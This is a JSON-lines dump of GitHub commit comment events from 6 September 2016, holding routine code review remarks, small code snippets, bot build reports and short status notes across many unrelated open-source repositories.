{"id":"4523827655","type":"CommitCommentEvent","actor":{"login":"FrostTheFox"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18918488,"position":null,"line":null,"path":null,"commit_id":"4d4a1461e6501afc85cd81d77f9c0915bc9cbb02","created_at":"2016-09-06T20:53:22Z","updated_at":"2016-09-06T20:53:22Z","body":"@roflinger the jelastic deploy button was under someone elses repo for some reason. It's coming back momentarily under our own repo."}},"created_at":"2016-09-06T20:53:22Z"}
{"id":"4523830568","type":"CommitCommentEvent","actor":{"login":"vxbinaca"},"repo":{"name":"bibanon/tubeup"},"payload":{"comment":{"id":18918496,"position":null,"line":null,"path":null,"commit_id":"fc7200e458f7a562ab257a2532656a8d215b42f6","created_at":"2016-09-06T20:53:52Z","updated_at":"2016-09-06T20:53:52Z","body":"@antonizoon new tag please, should be 0.0.4, I fixed something. "}},"created_at":"2016-09-06T20:53:52Z"}
{"id":"4523836335","type":"CommitCommentEvent","actor":{"login":"rost314"},"repo":{"name":"chrisz/pyhusmow"},"payload":{"comment":{"id":18918514,"position":null,"line":null,"path":null,"commit_id":"20ade04c161e6c1579c00bff82925fba672357de","created_at":"2016-09-06T20:54:59Z","updated_at":"2016-09-06T20:54:59Z","body":"Hi Chris,\r\ncool you replaced print with proper logging.\r\nI'm curious why you make extra effort to keep the xml output? Are you doing/planning some postprocessing? I even wanted to suggest to replace xml even for the requests because of readability.\r\n\r\nRobert"}},"created_at":"2016-09-06T20:54:59Z"}
{"id":"4523839772","type":"CommitCommentEvent","actor":{"login":"neiromendez"},"repo":{"name":"neiromendez/file-upload"},"payload":{"comment":{"id":18918522,"position":null,"line":null,"path":null,"commit_id":"e5b69fd389b7aef315baca3d4f632bc737264dbc","created_at":"2016-09-06T20:55:38Z","updated_at":"2016-09-06T20:55:38Z","body":"Hi Bro, I would suggest the proper using of [[]] {{}}\r\nalso I saw a simple bug when a user enable the manual upload I can't delete the file \r\nI solve this using the following code  "}},"created_at":"2016-09-06T20:55:38Z"}
{"id":"4523840689","type":"CommitCommentEvent","actor":{"login":"davidaurelio"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":18918521,"position":null,"line":null,"path":null,"commit_id":"bd60d828c5fc9cb066e5f647c87ecd6f70cb63a5","created_at":"2016-09-06T20:55:38Z","updated_at":"2016-09-06T20:55:38Z","body":"Removing as many special rules as possible"}},"created_at":"2016-09-06T20:55:38Z"}
{"id":"4523840565","type":"CommitCommentEvent","actor":{"login":"FrostTheFox"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":18918524,"position":null,"line":null,"path":null,"commit_id":"96cbe10d41ed3fdc5830875824a2e1e52b71d0d8","created_at":"2016-09-06T20:55:46Z","updated_at":"2016-09-06T20:55:46Z","body":"um ok well this was an accident but i don't think it broke things"}},"created_at":"2016-09-06T20:55:46Z"}
{"id":"4523840748","type":"CommitCommentEvent","actor":{"login":"neiromendez"},"repo":{"name":"neiromendez/file-upload"},"payload":{"comment":{"id":18918525,"position":null,"line":null,"path":null,"commit_id":"e5b69fd389b7aef315baca3d4f632bc737264dbc","created_at":"2016-09-06T20:55:48Z","updated_at":"2016-09-06T20:55:48Z","body":"cancel: function(file) {\r\n\t\t\t\tvar cont = 0;\r\n\t\t\t\tvar self = this;\r\n\t\t\t\tif (file && file.xhr) {\r\n\t\t\t\t\tfile.xhr.abort();\r\n\t\t\t\t\tthis.splice('files', this.files.indexOf(file), 1);\r\n\t\t\t\t\tthis._showDropText();\r\n\t\t\t\t}\r\n\t\t\t\tthis.files.forEach(function(item) {\r\n\t\t\t\t\tif (item.name == file.name) {\r\n\t\t\t\t\t\tself.splice('files', cont, 1);\r\n\t\t\t\t\t}\r\n\t\t\t\t\telse {\r\n\t\t\t\t\t\tcont++;\r\n\t\t\t\t\t}\r\n\t\t\t\t});\r\n\t\t\t}"}},"created_at":"2016-09-06T20:55:48Z"}
{"id":"4523842689","type":"CommitCommentEvent","actor":{"login":"Anton-Kulikov"},"repo":{"name":"andrew-kulikov/stunning-waffle"},"payload":{"comment":{"id":18918531,"position":null,"line":null,"path":null,"commit_id":"cbf95068e4d8f66c3cd5b6a7ff17fbff54bb6f64","created_at":"2016-09-06T20:56:10Z","updated_at":"2016-09-06T20:56:10Z","body":"Please write comprehended commit messages as well as text. Some meaningful words instead of numbers"}},"created_at":"2016-09-06T20:56:10Z"}
{"id":"4523843946","type":"CommitCommentEvent","actor":{"login":"jrose-apple"},"repo":{"name":"apple/swift"},"payload":{"comment":{"id":18918535,"position":null,"line":null,"path":null,"commit_id":"9948a359e588abaeb86a1c0b96a0547d7b190bb5","created_at":"2016-09-06T20:56:22Z","updated_at":"2016-09-06T20:56:22Z","body":"Does this mean we shouldn't suggest moving something to an extension to silence a selector conflict? Or is that already taken care of?"}},"created_at":"2016-09-06T20:56:22Z"}
{"id":"4523847928","type":"CommitCommentEvent","actor":{"login":"kellyi"},"repo":{"name":"WikiWatershed/model-my-watershed"},"payload":{"comment":{"id":18918545,"position":4,"line":21,"path":"src/mmw/apps/modeling/views.py","commit_id":"f13d14690d158e3d39d5b2d4dc508bf0e5d97df7","created_at":"2016-09-06T20:57:04Z","updated_at":"2016-09-06T20:57:04Z","body":"Happy to keep or drop this. \r\n\r\nIt looks like the entire set of national + drb point source data will be 23000 rows. I'm working from just the drb data right now, but will add the rest back in.\r\n\r\nI don't think we're using this in the app, but I saw this extension to the Django rest-framework which does cacheing, too: https://chibisov.github.io/drf-extensions/docs/#cache-response"}},"created_at":"2016-09-06T20:57:04Z"}
{"id":"4523848083","type":"CommitCommentEvent","actor":{"login":"mx3L"},"repo":{"name":"mx3L/serviceapp"},"payload":{"comment":{"id":18918546,"position":null,"line":null,"path":null,"commit_id":"28c10b1f909031152c3e75c31a6c60f27294783e","created_at":"2016-09-06T20:57:06Z","updated_at":"2016-09-06T20:57:06Z","body":">I think that five lines need counting only after the content part started.\r\nCorrect\r\n>Here's a real HLS master playlist, in which you can see that #EXTM3U is only in 20 line:\r\nit's on 2 contentline, we are counting from after content part started\r\n\r\nif (!contentStarted) is true, we check if we have empty line or not and set contentStarted flag if content started(emty line), then we continue from start of while loop. So we only start to count content lines once contentStarted is true.\r\n"}},"created_at":"2016-09-06T20:57:06Z"}
{"id":"4523855936","type":"CommitCommentEvent","actor":{"login":"TinkerWorkshop"},"repo":{"name":"anv-devs/wp-anvato-plugin"},"payload":{"comment":{"id":18918560,"position":null,"line":null,"path":null,"commit_id":"e180ce617f75b3e6c9a667c44980b6a875468393","created_at":"2016-09-06T20:58:29Z","updated_at":"2016-09-06T20:58:29Z","body":"@anv-devs \r\nFunction \"vip_safe_wp_remote_post\" does not exist.\r\nThis change throws a Fatal Error on WP VIP environment."}},"created_at":"2016-09-06T20:58:29Z"}
{"id":"4523856067","type":"CommitCommentEvent","actor":{"login":"edmunoz01"},"repo":{"name":"Uniandes-MISO4203/artwork-201620-1"},"payload":{"comment":{"id":18918561,"position":4,"line":27,"path":"artwork-api/src/main/java/co/edu/uniandes/csw/artwork/dtos/minimum/ArtistDTO.java","commit_id":"c4558ba873b0b56ed78c514d1c9f18f155c6cb50","created_at":"2016-09-06T20:58:31Z","updated_at":"2016-09-06T20:58:31Z","body":"Se procede a corregir la implementación cambiando el tipo primitivo a objeto."}},"created_at":"2016-09-06T20:58:31Z"}
{"id":"4523863946","type":"CommitCommentEvent","actor":{"login":"kabuhr"},"repo":{"name":"kabuhr/edlib"},"payload":{"comment":{"id":18918588,"position":1,"line":1,"path":"contrib/haskell/.gitignore","commit_id":"875c51d3eb5e9420c3adcddc1bf15eb3193d8097","created_at":"2016-09-06T20:59:54Z","updated_at":"2016-09-06T20:59:54Z","body":"Hi, @Martinsos,  Actually, my motivation was a little backwards.  I wanted to work through a fairly complete example of writing a Haskell binding just for my own practice, so I was looking for a C library that looked interesting and useful with a fairly small API, and I wanted one that didn't already have a Haskelll binding.  Edlib fit the bill -- in fact, it's such a great example, I'll probably write it up as a tutorial at some point.\r\n\r\nSo, I actually didn't have a particular Haskell-based Edlib application in mind.  But, I figure I'll clean it up a little in the next few weeks into a proper installable cabal package, and it might be useful to someone."}},"created_at":"2016-09-06T20:59:54Z"}
{"id":"4523864612","type":"CommitCommentEvent","actor":{"login":"ryfow"},"repo":{"name":"cch1/http.async.client"},"payload":{"comment":{"id":18918591,"position":null,"line":null,"path":null,"commit_id":"d441012ff8c78c7dbba54336fb8699500abfa19e","created_at":"2016-09-06T21:00:01Z","updated_at":"2016-09-06T21:00:01Z","body":"Thanks! Might be wise to update the Readme example which would now blow up if I'm reading this correctly."}},"created_at":"2016-09-06T21:00:01Z"}
{"id":"4523866795","type":"CommitCommentEvent","actor":{"login":"niemyjski"},"repo":{"name":"exceptionless/Exceptionless.LuceneQueryParser"},"payload":{"comment":{"id":18918593,"position":null,"line":null,"path":null,"commit_id":"49266ef94d06b45bc5c5618617b14cfa6b81d822","created_at":"2016-09-06T21:00:26Z","updated_at":"2016-09-06T21:00:26Z","body":"👍 \r\n"}},"created_at":"2016-09-06T21:00:26Z"}
{"id":"4523869371","type":"CommitCommentEvent","actor":{"login":"chunhui-shi"},"repo":{"name":"sudheeshkatkam/drill"},"payload":{"comment":{"id":18918598,"position":96,"line":96,"path":"exec/java-exec/src/main/java/org/apache/drill/exec/rpc/security/plain/PlainServer.java","commit_id":"1a8dece79965b8c0af27e6c62ac1af48b00203ab","created_at":"2016-09-06T21:00:52Z","updated_at":"2016-09-06T21:00:52Z","body":"completed should be set at the end of the whole authentication since it is the critical flag to decide if the user authenticated successfully."}},"created_at":"2016-09-06T21:00:52Z"}
{"id":"4523870880","type":"CommitCommentEvent","actor":{"login":"pbarry-r7"},"repo":{"name":"rapid7/metasploit-framework"},"payload":{"comment":{"id":18918602,"position":null,"line":null,"path":null,"commit_id":"9d5a276e91327fa5d71f06a063273c7b05733550","created_at":"2016-09-06T21:01:02Z","updated_at":"2016-09-06T21:01:02Z","body":"Apologies for the multiple commit messages here, I merged a merge.  :/"}},"created_at":"2016-09-06T21:01:02Z"}
{"id":"4523872314","type":"CommitCommentEvent","actor":{"login":"pbarry-r7"},"repo":{"name":"rapid7/metasploit-framework"},"payload":{"comment":{"id":18918607,"position":null,"line":null,"path":null,"commit_id":"a1a7fde31a1e2f81bb89ee16dd54b35e81240853","created_at":"2016-09-06T21:01:18Z","updated_at":"2016-09-06T21:01:18Z","body":"Apologies for the multiple commit messages here, I merged a merge.  :/"}},"created_at":"2016-09-06T21:01:18Z"}
{"id":"4523874534","type":"CommitCommentEvent","actor":{"login":"pbarry-r7"},"repo":{"name":"rapid7/metasploit-framework"},"payload":{"comment":{"id":18918616,"position":null,"line":null,"path":null,"commit_id":"0f30d3a720688186b9a277536ab3e7159dde736b","created_at":"2016-09-06T21:01:40Z","updated_at":"2016-09-06T21:01:40Z","body":"Apologies for the multiple commit messages here, I merged a merge.  :/"}},"created_at":"2016-09-06T21:01:40Z"}
{"id":"4523878024","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18918630,"position":null,"line":null,"path":null,"commit_id":"51c455dfba7bcbc70740fe5af88295896005561b","created_at":"2016-09-06T21:02:24Z","updated_at":"2016-09-06T21:02:24Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2364 of 2366 tests passed, 24 test warnings)\n\n * 5 tests had: EIO diffs.\n * 2 tests had: ESO big diffs.\n * 2 tests had: MTR big diffs.\n * 2 tests had: Table big diffs.\n * 25 tests had: AUD diffs.\n * 25 tests had: RDD diffs.\n * 15 tests had: ESO small diffs.\n * 13 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: MTD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51c455dfba7bcbc70740fe5af88295896005561b-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51c455dfba7bcbc70740fe5af88295896005561b-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.92%25-yellow.svg)</a> \n"}},"created_at":"2016-09-06T21:02:24Z"}
{"id":"4523880968","type":"CommitCommentEvent","actor":{"login":"neiromendez"},"repo":{"name":"neiromendez/file-upload"},"payload":{"comment":{"id":18918636,"position":null,"line":null,"path":null,"commit_id":"e5b69fd389b7aef315baca3d4f632bc737264dbc","created_at":"2016-09-06T21:03:00Z","updated_at":"2016-09-06T21:03:00Z","body":"![screen shot 2016-09-06 at 4 59 35 pm](https://cloud.githubusercontent.com/assets/12738472/18290900/4b9a830a-7453-11e6-9b71-f27368f82cef.png)\r\n\r\nhttps://www.polymer-project.org/1.0/docs/devguide/data-binding\r\n"}},"created_at":"2016-09-06T21:03:00Z"}
{"id":"4523881246","type":"CommitCommentEvent","actor":{"login":"hamzaze"},"repo":{"name":"hamzaze/ios-journey"},"payload":{"comment":{"id":18918638,"position":109,"line":109,"path":"0309_2_Homework7_SpendingTracker/0309_2_Homework7_SpendingTracker/ExpenseTableViewController.swift","commit_id":"c76de937fbcd14d0ebce43a778f51d742b71d5be","created_at":"2016-09-06T21:03:03Z","updated_at":"2016-09-06T21:03:03Z","body":"Ok, hvala.\n\nOn Tue, Sep 6, 2016 at 10:17 PM, irfanG <notifications@github.com> wrote:\n\n> imas li potrebe za ovim ? ja mislim da nemas\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/hamzaze/ios-journey/commit/c76de937fbcd14d0ebce43a778f51d742b71d5be#commitcomment-18917861>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATHqxCTYtTYNYD7eQ3VAkd5kmfXlUuuyks5qncpYgaJpZM4J2NG1>\n> .\n>\n"}},"created_at":"2016-09-06T21:03:03Z"}
{"id":"4523883546","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18918648,"position":null,"line":null,"path":null,"commit_id":"fd95e858fda90723c6cd5032f46b43c46e1e5800","created_at":"2016-09-06T21:03:30Z","updated_at":"2016-09-06T21:03:30Z","body":"The helper function looks big... but otherwise both ideas add two lines each to search and evaluate.... there are three yellows and one green with my idea and two yellows with Stephane's idea... so it's a pity if they go waste. I leave it to maintainers if it's a valid combo."}},"created_at":"2016-09-06T21:03:30Z"}
{"id":"4523886193","type":"CommitCommentEvent","actor":{"login":"neiromendez"},"repo":{"name":"neiromendez/file-upload"},"payload":{"comment":{"id":18918654,"position":null,"line":null,"path":null,"commit_id":"e5b69fd389b7aef315baca3d4f632bc737264dbc","created_at":"2016-09-06T21:03:55Z","updated_at":"2016-09-06T21:03:55Z","body":"and this Element GOOD JOB..! "}},"created_at":"2016-09-06T21:03:55Z"}
{"id":"4523892903","type":"CommitCommentEvent","actor":{"login":"mx3L"},"repo":{"name":"mx3L/serviceapp"},"payload":{"comment":{"id":18918670,"position":null,"line":null,"path":null,"commit_id":"28c10b1f909031152c3e75c31a6c60f27294783e","created_at":"2016-09-06T21:05:01Z","updated_at":"2016-09-06T21:05:01Z","body":"    if (!contentStarted)\r\n         {\r\n             if (!result)\r\n             {\r\n                 contentStarted = true;\r\n                 fprintf(stderr, \"[%s] - content part started\\n\", __func__);\r\n             }\r\n             continue;\r\n         }\r\nTalking about this part"}},"created_at":"2016-09-06T21:05:01Z"}
{"id":"4523898314","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18918687,"position":null,"line":null,"path":null,"commit_id":"51c455dfba7bcbc70740fe5af88295896005561b","created_at":"2016-09-06T21:05:56Z","updated_at":"2016-09-06T21:05:56Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51c455dfba7bcbc70740fe5af88295896005561b-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-06T21:05:56Z"}
{"id":"4523899413","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18918689,"position":null,"line":null,"path":null,"commit_id":"fd95e858fda90723c6cd5032f46b43c46e1e5800","created_at":"2016-09-06T21:06:10Z","updated_at":"2016-09-06T21:06:10Z","body":"Well, I don't know either, I did not write the rules ;)\r\n\r\nBut how about running your own idea at LTC. Do you think it could fare better at LTC ?"}},"created_at":"2016-09-06T21:06:10Z"}
{"id":"4523907469","type":"CommitCommentEvent","actor":{"login":"olesalscheider"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":18918704,"position":null,"line":null,"path":null,"commit_id":"5486bf810fccbb2c2aebcdaf49da0d8373353107","created_at":"2016-09-06T21:07:37Z","updated_at":"2016-09-06T21:07:37Z","body":"I wonder if we want to call the other functions in debug.cc at all.\r\nWhen I proposed this I thought that we should just add everything from debug.cc to the class, including the static variables..."}},"created_at":"2016-09-06T21:07:37Z"}
{"id":"4523909899","type":"CommitCommentEvent","actor":{"login":"sdumitriu"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":18918713,"position":2,"line":199,"path":"components/patient-data/impl/src/main/java/org/phenotips/data/internal/SecurePatientRepository.java","commit_id":"c6acbd04dc4d6c7c08a0429effbe63cd828b3add","created_at":"2016-09-06T21:08:04Z","updated_at":"2016-09-06T21:08:04Z","body":"This method isn't needed anymore, `delete` is part of the entities API now."}},"created_at":"2016-09-06T21:08:04Z"}
{"id":"4523912349","type":"CommitCommentEvent","actor":{"login":"snyderizer"},"repo":{"name":"snyderizer/pycaption-cli"},"payload":{"comment":{"id":18918719,"position":null,"line":null,"path":null,"commit_id":"d635d3ffdd9d2949344f1f82ec4f1fe5303ae0a5","created_at":"2016-09-06T21:08:31Z","updated_at":"2016-09-06T21:08:31Z","body":"ah, I didn't find that when I was looking around for this.  Thanks for the tip!"}},"created_at":"2016-09-06T21:08:31Z"}
{"id":"4523915126","type":"CommitCommentEvent","actor":{"login":"jhendrixMSFT"},"repo":{"name":"jhendrixMSFT/roslyn"},"payload":{"comment":{"id":18918723,"position":48,"line":48,"path":"bootstrap.ps1","commit_id":"ec194ee1f44c3bcabdea3f04e917ed3168ec8ea6","created_at":"2016-09-06T21:09:01Z","updated_at":"2016-09-06T21:09:01Z","body":"I've made both of these changes."}},"created_at":"2016-09-06T21:09:01Z"}
{"id":"4523917699","type":"CommitCommentEvent","actor":{"login":"saw"},"repo":{"name":"saw/quill"},"payload":{"comment":{"id":18918727,"position":12,"line":12,"path":"formats/table.js","commit_id":"540f79603e19d2294e0df0993670c5bcf1f492a0","created_at":"2016-09-06T21:09:29Z","updated_at":"2016-09-06T21:09:29Z","body":"I'm not sure what you think is the best approach for preserving the innerHTML of the table in this case, I didn't see any existing examples"}},"created_at":"2016-09-06T21:09:29Z"}
{"id":"4523917743","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18918729,"position":null,"line":null,"path":null,"commit_id":"298d4a719d748e0842b82abe52bf1ab0e4441adf","created_at":"2016-09-06T21:09:30Z","updated_at":"2016-09-06T21:09:30Z","body":"did #20 "}},"created_at":"2016-09-06T21:09:30Z"}
{"id":"4523918663","type":"CommitCommentEvent","actor":{"login":"saw"},"repo":{"name":"saw/quill"},"payload":{"comment":{"id":18918732,"position":7,"line":7,"path":"formats/table.js","commit_id":"540f79603e19d2294e0df0993670c5bcf1f492a0","created_at":"2016-09-06T21:09:39Z","updated_at":"2016-09-06T21:09:39Z","body":"Obviously sanitization is needed here."}},"created_at":"2016-09-06T21:09:39Z"}
{"id":"4523919611","type":"CommitCommentEvent","actor":{"login":"aekeus"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18918737,"position":null,"line":null,"path":null,"commit_id":"1bd17ea1c5cf4b4f8b214e91057baa684da9be4f","created_at":"2016-09-06T21:09:49Z","updated_at":"2016-09-06T21:09:49Z","body":"++"}},"created_at":"2016-09-06T21:09:49Z"}
{"id":"4523919710","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18918738,"position":null,"line":null,"path":null,"commit_id":"48ee7532c37e1bfeeab9c9e6683558e15d9d2fd3","created_at":"2016-09-06T21:09:51Z","updated_at":"2016-09-06T21:09:51Z","body":"did #20 "}},"created_at":"2016-09-06T21:09:51Z"}
{"id":"4523920446","type":"CommitCommentEvent","actor":{"login":"danielmarbach"},"repo":{"name":"Particular/NServiceBus"},"payload":{"comment":{"id":18918742,"position":null,"line":null,"path":null,"commit_id":"411d1b32cdf126e0ac61e783129085f783c9b3c7","created_at":"2016-09-06T21:09:59Z","updated_at":"2016-09-06T21:09:59Z","body":"Could you elaborate?\n>\n>\n"}},"created_at":"2016-09-06T21:09:59Z"}
{"id":"4523920940","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18918744,"position":null,"line":null,"path":null,"commit_id":"d4744a99c2def4c98c2d590095eabc6d2fb7ee79","created_at":"2016-09-06T21:10:06Z","updated_at":"2016-09-06T21:10:06Z","body":"did #20 "}},"created_at":"2016-09-06T21:10:06Z"}
{"id":"4523924256","type":"CommitCommentEvent","actor":{"login":"olesalscheider"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":18918749,"position":null,"line":null,"path":null,"commit_id":"21607f772da696f044db8fb4e40f1abeff43e5b9","created_at":"2016-09-06T21:10:42Z","updated_at":"2016-09-06T21:10:42Z","body":"I also think that this improves readability, so +1 for now.\r\n\r\nPlain qCDebug allows the user to specify how the debug output is printed but I am not sure how this will work together with the telepathy debug infrastructure. But we can think about that once we start to use it."}},"created_at":"2016-09-06T21:10:42Z"}
{"id":"4523924849","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18918750,"position":null,"line":null,"path":null,"commit_id":"8ac7a22e1c5fe0ed2f9659e74790abd357170aba","created_at":"2016-09-06T21:10:48Z","updated_at":"2016-09-06T21:10:48Z","body":"did #12"}},"created_at":"2016-09-06T21:10:48Z"}
{"id":"4523925240","type":"CommitCommentEvent","actor":{"login":"koffeinfrei"},"repo":{"name":"panter/mykonote-app"},"payload":{"comment":{"id":18918751,"position":6,"line":6,"path":"config.xml","commit_id":"f23f232af379cc55901ef49e99a44867b6f2b8bd","created_at":"2016-09-06T21:10:52Z","updated_at":"2016-09-06T21:10:52Z","body":"We currently don't have a valid certificate..."}},"created_at":"2016-09-06T21:10:52Z"}
{"id":"4523926403","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18918755,"position":null,"line":null,"path":null,"commit_id":"5565c6b83be1187d2290476f696a5b9cca38d4dd","created_at":"2016-09-06T21:11:04Z","updated_at":"2016-09-06T21:11:04Z","body":"did #27 "}},"created_at":"2016-09-06T21:11:04Z"}
{"id":"4523927411","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18918760,"position":null,"line":null,"path":null,"commit_id":"2333de507e24ae11915582a02d123f59fae759bd","created_at":"2016-09-06T21:11:13Z","updated_at":"2016-09-06T21:11:13Z","body":"did #27 "}},"created_at":"2016-09-06T21:11:13Z"}
{"id":"4523928689","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18918764,"position":null,"line":null,"path":null,"commit_id":"1b8c9959467c53e59c1112d872c15ffbfd849d90","created_at":"2016-09-06T21:11:27Z","updated_at":"2016-09-06T21:11:27Z","body":"did #27 "}},"created_at":"2016-09-06T21:11:27Z"}
{"id":"4523930330","type":"CommitCommentEvent","actor":{"login":"koffeinfrei"},"repo":{"name":"panter/mykonote-app"},"payload":{"comment":{"id":18918767,"position":null,"line":null,"path":null,"commit_id":"76b2ca9bf9377bfa748973a2cf32ad1c2c46ca11","created_at":"2016-09-06T21:11:44Z","updated_at":"2016-09-06T21:11:44Z","body":"Yes, this was just temporary. Already fixed in 2c6d8bf4608e9646cff151b35d81ea6a6f668562"}},"created_at":"2016-09-06T21:11:44Z"}
{"id":"4523932572","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18918777,"position":null,"line":null,"path":null,"commit_id":"38c2faae0a94916ed81eca0be022bd808264d862","created_at":"2016-09-06T21:12:11Z","updated_at":"2016-09-06T21:12:11Z","body":"did #25"}},"created_at":"2016-09-06T21:12:11Z"}
{"id":"4523934382","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18918785,"position":null,"line":null,"path":null,"commit_id":"ff7578ca9f3dc29a2064138bc05c38ac18476338","created_at":"2016-09-06T21:12:28Z","updated_at":"2016-09-06T21:12:28Z","body":"did #20 "}},"created_at":"2016-09-06T21:12:28Z"}
{"id":"4523935828","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18918799,"position":null,"line":null,"path":null,"commit_id":"d643236fd5ae615a6cab2a30c541a1fd7d6ffc7d","created_at":"2016-09-06T21:12:43Z","updated_at":"2016-09-06T21:12:43Z","body":"did #20 "}},"created_at":"2016-09-06T21:12:43Z"}
{"id":"4523936493","type":"CommitCommentEvent","actor":{"login":"ajithcj"},"repo":{"name":"ajithcj/Stockfish"},"payload":{"comment":{"id":18918801,"position":null,"line":null,"path":null,"commit_id":"fd95e858fda90723c6cd5032f46b43c46e1e5800","created_at":"2016-09-06T21:12:51Z","updated_at":"2016-09-06T21:12:51Z","body":"Yes but LTC is quite expensive and frankly I have no good reason to believe the test will do better at LTC... And my tests have failed multiple times after more than 40k games.... don't want to waste resources... maybe this can be approved at low priority on an empty framework."}},"created_at":"2016-09-06T21:12:51Z"}
{"id":"4523939444","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18918817,"position":null,"line":null,"path":null,"commit_id":"dd9b94bc8a12e1a3eae76d9c10cb2c1f771199cb","created_at":"2016-09-06T21:13:21Z","updated_at":"2016-09-06T21:13:21Z","body":"did #6 "}},"created_at":"2016-09-06T21:13:21Z"}
{"id":"4523939819","type":"CommitCommentEvent","actor":{"login":"huerlisi"},"repo":{"name":"panter/mykonote-app"},"payload":{"comment":{"id":18918818,"position":6,"line":6,"path":"config.xml","commit_id":"f23f232af379cc55901ef49e99a44867b6f2b8bd","created_at":"2016-09-06T21:13:25Z","updated_at":"2016-09-06T21:13:25Z","body":"Ach du heilige Scheisse :imp: "}},"created_at":"2016-09-06T21:13:25Z"}
{"id":"4523940619","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18918820,"position":null,"line":null,"path":null,"commit_id":"8d073e1cae6140c743cd7d86241408a5881d6945","created_at":"2016-09-06T21:13:33Z","updated_at":"2016-09-06T21:13:33Z","body":"did #29 "}},"created_at":"2016-09-06T21:13:33Z"}
{"id":"4523941481","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18918824,"position":null,"line":null,"path":null,"commit_id":"a9c93226dea7f39b376b67da0fbfc6191126bb76","created_at":"2016-09-06T21:13:42Z","updated_at":"2016-09-06T21:13:42Z","body":"did #28 "}},"created_at":"2016-09-06T21:13:42Z"}
{"id":"4523941746","type":"CommitCommentEvent","actor":{"login":"rapperskull"},"repo":{"name":"opengapps/opengapps"},"payload":{"comment":{"id":18918826,"position":null,"line":null,"path":null,"commit_id":"d2413c21b682dd211b85962979ebb56c9b6eb6fd","created_at":"2016-09-06T21:13:46Z","updated_at":"2016-09-06T21:13:46Z","body":"I was going to report that ExtServices and ExtShared were not removed, than I saw your commit."}},"created_at":"2016-09-06T21:13:46Z"}
{"id":"4523943339","type":"CommitCommentEvent","actor":{"login":"189764"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18918832,"position":null,"line":null,"path":null,"commit_id":"22a3fa5c2a605b4674f60bc21329cda477b56a06","created_at":"2016-09-06T21:14:02Z","updated_at":"2016-09-06T21:14:02Z","body":"did #28 \r\ndid #12 "}},"created_at":"2016-09-06T21:14:02Z"}
{"id":"4523944402","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/yokozuna"},"payload":{"comment":{"id":18918836,"position":null,"line":null,"path":null,"commit_id":"56ca553f92dbbb5b508dc1665003d6b751c68fc1","created_at":"2016-09-06T21:14:13Z","updated_at":"2016-09-06T21:14:13Z","body":"saw approval from JeetKunDoug\nat https://github.com/basho/yokozuna/commit/56ca553f92dbbb5b508dc1665003d6b751c68fc1"}},"created_at":"2016-09-06T21:14:13Z"}
